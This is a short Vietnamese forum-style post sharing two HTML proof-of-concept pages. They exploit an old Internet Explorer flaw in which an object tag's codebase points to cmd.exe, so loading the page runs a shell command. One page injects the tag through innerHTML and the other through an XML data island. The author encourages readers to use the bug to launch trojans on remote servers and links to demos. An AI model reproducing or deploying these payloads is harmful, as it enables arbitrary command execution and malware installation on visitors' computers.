Các bạn save và chạy đoạn html sau:
<html>
<body>
<span id="oSpan"></span>
<script language="javascript">
oSpan.innerHTML="<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/cmd.exe?/c+dir "></object>";
</script>
</body>
</html>
hoặc
<html>
<body>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/cmd.exe?/c+dir"></object>
]]>
</exploit>
</security>
</xml>
</body>
</html>
Tuy nó có hạn chế là ko chạy được thêm các parameters truyền vào, nhưng các bạn thử xem có thể lợi dụng lỗi này để làm được nhiều việc rất có ích, như kích hoạt trojan ở remote server chẳng hạn.
Thử demo ở đây hoặc đây